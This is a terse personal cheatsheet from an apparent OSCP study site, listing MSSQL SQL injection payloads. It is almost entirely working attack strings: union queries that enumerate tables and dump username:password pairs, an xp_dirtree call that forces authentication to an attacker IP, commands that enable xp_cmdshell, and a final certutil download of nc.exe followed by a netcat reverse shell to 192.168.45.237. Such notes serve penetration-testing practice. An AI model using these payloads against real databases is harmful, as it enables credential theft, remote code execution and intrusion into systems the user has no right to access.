// notes/ Web Exploitation
🕸️

SQL Injection MSSQL Cheatsheet

<strongunion select name,id from &#x3C;db..sysobjects where xtype='u'-- -

#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_mssql-cheatsheet

MSSQL Cheatsheet

Database names and ID's

<pre><code>user db_name(5) <strong>union select name,id from &#x3C;db>..sysobjects where xtype='u'-- - </strong>union select concat(name,':',id) from &#x3C;db>..sysobjects where xtype='u'-- - union select 1,(select string_agg(concat(name,':',id), '|') from &#x3C;db>..sysobjects where xtype='u')-- - </code></pre>
code
01Select @@version;
02Select name from sys.databases;
03select * from master.information_schema.tables;
04select * from master..users;

{% hint style="info" %} database's 1-4 are default mssql databases ; also note down the database ID for table queries {% endhint %}

Enumerate columns

code
01union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')

Dump columns

code
01union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -

{% hint style="info" %} %s/[ ]//g

%s/|/\r/g

cat cracked | awk -F: '{print $1":"$3}'

cat cracked | awk -F: '{print $1}' {% endhint %}

Query stacking with ;

code
01q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -

RCE

code
01sp_configure 'show advanced options', '1'
02RECONFIGURE
03sp_configure 'xp_cmdshell', '1'
04RECONFIGURE
code
01'EXEC sp_configure 'show advanced options',1-- -
02'RECONFIGURE-- -
03'EXEC sp_configure 'xp_cmdshell',1-- -
04'RECONFIGURE-- -
code
01'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -
<pre><code><strong>'EXEC xp_cmdshell 'certutil.exe -f -urlcache "http://192.168.45.237/nc.exe" C:\programdata\nc.exe'-- - </strong>'EXEC xp_cmdshell 'powershell.exe -c "C:\Programdata\nc.exe -e powershell.exe 192.168.45.237 1337"'-- - </code></pre>